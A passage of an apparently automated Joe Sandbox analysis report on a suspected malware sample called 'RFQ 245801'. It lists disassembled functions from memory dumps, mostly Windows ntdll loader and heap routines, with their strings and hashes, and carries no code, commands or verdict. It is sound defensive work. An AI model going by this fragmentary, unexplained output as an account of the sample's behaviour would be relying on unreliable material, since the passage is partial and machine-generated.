                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                  • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                                                                                                                                                                  Function 0040ACE3 Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                  • Instruction ID: 05bc5eed07a0c19d6aa88ef3f94ab0c5740ad5768756de9c93d4a761ab8051c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                  • Instruction Fuzzy Hash: DEB09231A942182AEA74D6D89C06B2AB755DB85712F144296BD2CA67C0E4A22D2041EA
                                                                                                                                                                                  Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                                                                  • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                                                                                                                                                  • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                                                  • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                                                                  • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                                                                                                                                                  Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                                                                                                  • Critical section address., xrefs: 01795502
                                                                                                                                                                                  • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                                                                                                  • Thread identifier, xrefs: 0179553A
                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                                                                                                  • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                                                                                                  • 8, xrefs: 017952E3
                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                                                                                                  • corrupted critical section, xrefs: 017954C2
                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                  • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                                                                  • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                                                                                                                                                  Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                                                                                                  • @, xrefs: 0179259B
                                                                                                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                  • API String ID: 0-4009184096
                                                                                                                                                                                  • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                                                                  • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                                                                                                                                                  Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                  • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                  • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                                                                                                                  Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                  • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                  • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                                                                                                                  • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                                                                                                                  Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                                                                  • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                                                                  • HandleTraces, xrefs: 017A8C8F
                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                                                                  • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                                                                  • VerifierFlags, xrefs: 017A8C50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                  • Opcode ID: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                                                                  • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47557527c9cbdfd01b9b7f0a8cd04aa51a3c9914bf4f9a674c14f15599e62b91
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                                                                                                  Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                  • API String ID: 0-1109411897
                                                                                                                                                                                  • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                  • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                                                                                                                  Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                  • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                  • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                                                                                                                  Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                                                                  • apphelp.dll, xrefs: 01716496
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                  • Opcode ID: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                                                                  • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49cd75af94a2931510ca99bce9f6f1582fb6979c96387e506e049c9dd7ab350
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                                                                                                                  Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                  • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                  • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                                                                                                                  Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                  • Opcode ID: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                                                                  • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1057e5786fc599db291060d32a63e890f6d1d094d4bd5c48e01bc6d20b5d3ee3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                                                                                                                  Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1404860816-0
                                                                                                                                                                                  • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                  • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                                                                                                                  Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                  • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                  • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                                                                                                                  Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                                                                  • @, xrefs: 01758591
                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                  • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                  • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
